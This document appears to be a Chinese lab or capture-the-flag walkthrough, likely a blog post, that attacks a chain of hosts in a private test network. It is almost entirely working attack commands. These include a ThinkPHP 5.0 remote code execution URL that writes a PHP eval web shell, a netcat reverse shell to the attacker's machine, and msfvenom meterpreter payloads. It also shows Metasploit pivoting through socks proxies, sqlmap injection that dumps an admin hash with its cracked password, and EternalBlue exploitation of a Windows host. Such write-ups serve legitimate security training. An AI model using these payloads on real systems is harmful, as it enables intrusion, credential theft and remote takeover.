nmap扫描
nmap -sV -p1-65535 192.168.1.135
![](https://upload-images.jianshu.io/upload_images/4664072-78e29cf593f003fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-57bd60159dfde305.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
thinkphp5.0版本
找到poc进行测试
http://192.168.1.135/index.php?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
![](https://upload-images.jianshu.io/upload_images/4664072-c757b95937d28297.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.1.135/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > 1.php
![](https://upload-images.jianshu.io/upload_images/4664072-3d17a9a73c709e12.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
写入成功
![](https://upload-images.jianshu.io/upload_images/4664072-5e848a07cff0a5a2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
进行转义
http://192.168.1.135/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" >2.php
![](https://upload-images.jianshu.io/upload_images/4664072-ddf2150ee7e7c7cc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
或者使用base64位编码
<?php @eval($_POST['cmd']);?>
转码位
PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=
http://192.168.1.103/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="| base64 -d > 3.php
反弹kali
nc 192.168.1.104 6666 -e /bin/bash
kali获取bash
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://upload-images.jianshu.io/upload_images/4664072-8b41019caf17f00f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
flag
![](https://upload-images.jianshu.io/upload_images/4664072-bc6cb19c477205fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8d9ea2d752f67ae9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-789497480d675e56.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=1234 -f elf >1.elf
蚁剑上传
chmod 777 1.elf
./elf
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > run
![](https://upload-images.jianshu.io/upload_images/4664072-2f892c44e04d3ecd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ce6ddb0e97aa31d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
获取当前的网段
run get_local_subnets
![](https://upload-images.jianshu.io/upload_images/4664072-4a7af3822086ab99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
添加理由
run autoroute -s 192.168.22.0/24
run autoroute -p
![](https://upload-images.jianshu.io/upload_images/4664072-3ec876a1b8473f60.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
内网扫描
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
![](https://upload-images.jianshu.io/upload_images/4664072-0dfdb1438a158cf4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
设置socks4a代理
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
srvport => 2222
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
![](https://upload-images.jianshu.io/upload_images/4664072-0eaafcdbbbef01fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
修改proxychains
vim /etc/proxychains.conf
socks4 192.168.1.128 2222
![](https://upload-images.jianshu.io/upload_images/4664072-ceadb9bc9506f30a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
proxychains nmap -Pn -sT 192.168.22.129
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect
![](https://upload-images.jianshu.io/upload_images/4664072-ff4ba0b08bb80ebf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
代理打开80网站
![](https://upload-images.jianshu.io/upload_images/4664072-622f0ba02fa39c0a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
proxychains dirb http://192.168.22.129
![](https://upload-images.jianshu.io/upload_images/4664072-f1e26b2947a36f8f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-39281c56802db920.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a8bc9dcca16f8524.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
注入
proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword
proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword --dbs
proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns
proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password –dump
admin | 46f94c8de14fb36680850768ff1b7f2a (123qwe)
登录后台
![](https://upload-images.jianshu.io/upload_images/4664072-a4fa80be8e032540.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
设置proxifier
msf生成木马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=432 -f elf > 5.elf
这次代理使用的bindtcp是Target2作为监听
proxychains msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 432
msf5 exploit(multi/handler) > run
![](https://upload-images.jianshu.io/upload_images/4664072-3ecb67c943f5d7ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
获取当前网段
run get_local_subnets
![](https://upload-images.jianshu.io/upload_images/4664072-3a9c3fbdc39874bf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
添加路由
run autoroute -s 192.168.33.0/24
run autoroute -p
![](https://upload-images.jianshu.io/upload_images/4664072-b4d5b69575a316ce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2223
srvport => 2223
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 2.
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) >
![](https://upload-images.jianshu.io/upload_images/4664072-a051fed2f4b43bf5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
修改proxychains
vim /etc/proxychains.conf
socks4 127.0.0.1 2223
探测33网段
use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24
msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128
![](https://upload-images.jianshu.io/upload_images/4664072-3fff449e53e418dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
端口扫描
proxychains nmap -Pn -sT 192.168.33.33
![](https://upload-images.jianshu.io/upload_images/4664072-3522f762d7811858.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
开放了445和3389端口
auxiliary/scanner/smb/smb_version
![](https://upload-images.jianshu.io/upload_images/4664072-b4de36f13fdaaf1b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33
rhosts => 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
![](https://upload-images.jianshu.io/upload_images/4664072-1decb2c0779f8cc0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.33.33
rhost => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
![](https://upload-images.jianshu.io/upload_images/4664072-87f2b3dc64792376.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.33.33
RHOST => 192.168.33.33
msf5 exploit(windows/smb/ms17_010_psexec) > run
65001 UTF-8代码页 解决乱码
chcp 65001
![](https://upload-images.jianshu.io/upload_images/4664072-f624de02e76ed6d0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-cb9673c16101104e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)